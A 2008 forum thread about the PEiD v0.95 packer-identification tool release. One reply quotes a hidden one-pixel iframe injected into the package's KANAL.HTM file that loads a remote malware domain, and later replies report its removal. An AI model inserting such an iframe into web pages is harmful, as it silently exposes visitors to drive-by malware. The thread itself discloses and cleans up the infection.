Author Topic: PEiD v0.95 ;-)  (Read 6812 times)

0 Members and 1 Guest are viewing this topic.

October 25, 2008, 12:59:41 pm
Read 6812 times

sowhat-x

  • Guest
Build 21 Oct 2008... (codename Phoenix)
http://www.peid.info/news.html
No radical changes in this build yet - if there are any questions,feel free to ask about it...
if i'm able and/or allowed to answer them of course,he-he!!  ;D
In short though...
1)Many many bugfixes compared to v0.94...
2)About 70 more signatures added internally...

v1.0 is also in development since quite some time now...being completely re-written from scratch,
with numerous changes...and way much more signatures than v0.9x series ;)

October 25, 2008, 02:42:38 pm
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
You might want to get them to fix the upload:

in KANAL.HTM

Code: [Select]
<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
http://www.virustotal.com/analisis/959994d0a6ab333f3b6f4522feb289da

ntkrnlpa.info is NX though so shouldn't really be a problem.

October 25, 2008, 02:52:04 pm
Reply #2

sowhat-x

  • Guest
What the heck...I'll try fixing it myself asap,or else,
it should be fixed during the day,and obviously I'll notify immediately about it ;-)

October 25, 2008, 03:37:43 pm
Reply #3

sowhat-x

  • Guest
Removed the offensive hyperlink from kanal.htm - package is ok now.
To avoid misunderstanding,exes and dlls were obviously not affected...
and by the way,for some unknown reason...Sophos still doesn't like us,he-he...  ;)

Kinda weird actually...Domaintools reports:
Created On:30-Sep-2008 05:17:47 UTC
Sponsoring Registrar:EstDomains, Inc.
Hmmm...injected kanal.htm's file attributes though was dated 18 Oct 2007,
so I guess something phishy went on here...  ;)

Now you tell me...was this fast enough,or are we gonna have peid.info listed in mdl.php?  ;D


October 25, 2008, 03:41:43 pm
Reply #4

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Very fast :D

Should I remove these replies so as not too damage the rep of PEiD at all?

October 25, 2008, 03:45:43 pm
Reply #5

sowhat-x

  • Guest
Personally speaking always,I'd leave them here...
so that anyone knows that mass injections are a very serious problem out there,
and more than possible to happen,no matter if you're security-aware or not...

Still kinda puzzled with date mentioned before...
registered on EstDomains during late September - you get my point  ;)

October 25, 2008, 04:15:45 pm
Reply #6

_pusher_

  • Newbie

  • Offline
  • *

  • 4
thank you for finding this guys, dunno how this file got infected.. ive had it for a while and never executed it..
kanal coder is within AV biz so he might have been infected then ???
eh sorry for the troubles and thank you again  :)

November 07, 2008, 09:18:57 pm
Reply #7

sowhat-x

  • Guest
KANAL has been updated to v2.92 couple days ago by the way...
http://www.peid.info/plugins/Kanal292.rar